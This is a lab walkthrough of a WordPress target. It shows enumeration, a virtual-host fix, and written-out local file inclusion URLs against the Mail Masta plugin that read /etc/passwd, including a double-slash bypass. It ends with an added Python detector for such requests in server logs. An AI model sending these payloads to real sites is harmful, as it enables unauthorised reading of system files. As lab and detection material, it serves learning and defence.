Let’s start this awesome adventure!
You can start here: TEST LAB 14
We have 2 entry point addresses:
Let’s enumerate 192.168.101.14 first.
As always, let’s start with an nmap scan.
Let’s start with port 80. When we visit the webpage we get this error:
Why is this happening?
Because of webserver virtual hosts.
virtual hosts -> allow you to run more than one website on a single machine.
When we browse a machine using a domain name, for example test.vulnhub, the webserver will direct you to the content based on the Host header. If we don’t do this and browse the machine with the raw IP address, that header won’t be set properly and you’ll get a default page or an error page.
We need to add this hostname into /etc/hosts
/etc/hosts -> translates hostnames to IP addresses
For Windows users, you can find it here -> c:\windows\system32\drivers\etc\hosts
We can also use the hosts file because it’s easier to remember the hostname/domain than the IP address.
Let’s add it.
Now we can see a WordPress site!
Let’s run wpscan
Let’s search for possible exploits.
Let’s test it out.
http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
This gives us an error message, hmm... We can bypass that using // (a double slash).
That is probably an error in the developer’s code.
http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=//etc//passwd
At the end we can see this: token_hrTY9s4Cv. We got it!
Site Token -> hrTY9s4Cv
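For spotting requests like the two above in web server logs, here is an added example (not part of the original walkthrough) that normalizes the pl parameter before matching, because a literal /etc/passwd signature misses the //etc//passwd form. The log lines, status codes and the list of sensitive prefixes are constructed for the example.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

PLUGIN = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"
# Constructed access-log lines (addresses, times, status codes are made up).
SAMPLE_LOG = [
    f'10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET {PLUGIN}?pl=/etc/passwd HTTP/1.1" 403 162',
    f'10.0.0.5 - - [01/Jan/2020:10:00:05 +0000] "GET {PLUGIN}?pl=//etc//passwd HTTP/1.1" 200 1873',
    f'10.0.0.5 - - [01/Jan/2020:10:00:09 +0000] "GET {PLUGIN}?pl=%2F%2Fetc%2F%2Fpasswd HTTP/1.1" 200 1873',
    '10.0.0.9 - - [01/Jan/2020:10:01:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/var/log/")  # assumption: tune per host


def naive_hits(lines):
    """Literal signature match: what a simple string rule would catch."""
    return [line for line in lines if "/etc/passwd" in line]


def normalize(path):
    """Reduce a path to the form the filesystem will actually resolve."""
    # normpath alone keeps a leading '//', so collapse slash runs first.
    collapsed = re.sub(r"/{2,}", "/", path)
    return posixpath.normpath(collapsed)


def suspicious_includes(lines, param="pl"):
    """Return (raw_value, normalized_value, status) for flagged requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target, status = m.group(1), int(m.group(2))
        # parse_qs also percent-decodes the value once.
        for raw in parse_qs(urlsplit(target).query).get(param, []):
            norm = normalize(raw)
            traversal = ".." in norm.split("/")
            if traversal or norm.startswith(SENSITIVE_PREFIXES):
                hits.append((raw, norm, status))
    return hits


if __name__ == "__main__":
    print("literal match:", len(naive_hits(SAMPLE_LOG)))
    for raw, norm, status in suspicious_includes(SAMPLE_LOG):
        print(f"{status}  {raw!r} -> {norm!r}")
```

A flagged request that returned 200 is the one to triage first, since it means the file content was likely served.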
See you, in the next step!